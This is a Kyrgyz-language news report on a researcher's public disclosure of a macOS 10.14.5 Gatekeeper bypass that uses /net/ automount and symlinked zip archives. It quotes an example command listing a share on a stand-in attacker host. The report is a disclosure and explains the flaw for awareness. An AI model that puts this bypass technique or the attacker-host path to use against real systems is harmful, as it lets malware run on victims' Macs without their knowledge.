Амая Томан Коопсуздук боюнча изилдөөчү Филиппо Кавалларин өзүнүн блогунда macOS 10.14.5деги мүчүлүштүк тууралуу эскертүү жарыялады. Бул Gatekeeperдин коопсуздук чараларын толугу менен айланып өтүү мүмкүнчүлүгүнөн турат. Каваллариндин айтымында, ал Apple компаниясына ушул жылдын февраль айында катаны көрсөткөн, бирок компания аны акыркы жаңыртууда оңдогон эмес.
Gatekeeper Apple тарабынан иштелип чыккан жана 2012-жылы биринчи жолу анын иш тактасынын операциялык тутумуна киргизилген. Бул колдонуучунун маалыматы жана макулдугусуз тиркеменин иштөөсүнө жол бербөөчү механизм. Колдонмону жүктөп алгандан кийин, Gatekeeper автоматтык түрдө анын кодун текшерип, программага Apple тарабынан туура кол коюлганын текшерет.
Болушу мүмкүн сени кызыктырат
Кавалларин өзүнүн блогунда билдирүүсүндө, Gatekeeper, демейки боюнча, тышкы сактагычты да, тармак үлүштөрүн да коопсуз жерлер деп эсептейт. Бул максаттарда жайгашкан бардык тиркемелер дарбазачы текшерүүсүнөн өтпөстөн автоматтык түрдө ишке киргизилиши мүмкүн. Бул колдонуучу билбестен зыяндуу программалык камсыздоону ишке киргизүү үчүн пайдаланылышы мүмкүн.
Уруксатсыз кирүүгө мүмкүндүк берген аспекттердин бири - бул автомонтаждоо өзгөчөлүгү, ал колдонуучуларга жөн гана "/net/" менен башталган жолду көрсөтүү менен тармак бөлүшүүсүн автоматтык түрдө орнотууга мүмкүндүк берет. Мисал катары, Кавалларин "ls /net/evil-attacker.com/sharedfolder/" жолун келтирет, бул операциялык тутумга зыяндуу болушу мүмкүн болгон алыскы жерде "sharefolder" папкасынын мазмунун жүктөөгө алып келиши мүмкүн.
Коркунучтун кантип иштээрин видеодон көрө аласыз:
Дагы бир фактор, эгерде automount функциясына алып баруучу белгилүү бир символдук шилтемени камтыган zip архиви бөлүшүлсө, ал Gatekeeper тарабынан текшерилбейт. Ошентип, жабырлануучу зыяндуу архивди оңой жүктөп алып, аны ача алат, бул чабуулчуга Mac'та колдонуучунун билбестен дээрлик бардык программалык камсыздоону иштетүүгө мүмкүндүк берет. Демейки боюнча белгилүү бир кеңейтүүлөрдү жашырган Finder да бул кемчиликтин үлүшүнө ээ.
Кавалларин өзүнүн блогунда Apple ушул жылдын 22-февралында macOS операциялык тутумунун алсыздыгына көңүл бурганын айтат. Бирок май айынын орто ченинде Apple Cavallarin менен байланышын токтоткондуктан, Кавалларин баарын ачык жарыялоону чечти.
Маалымат булагы: FCVL
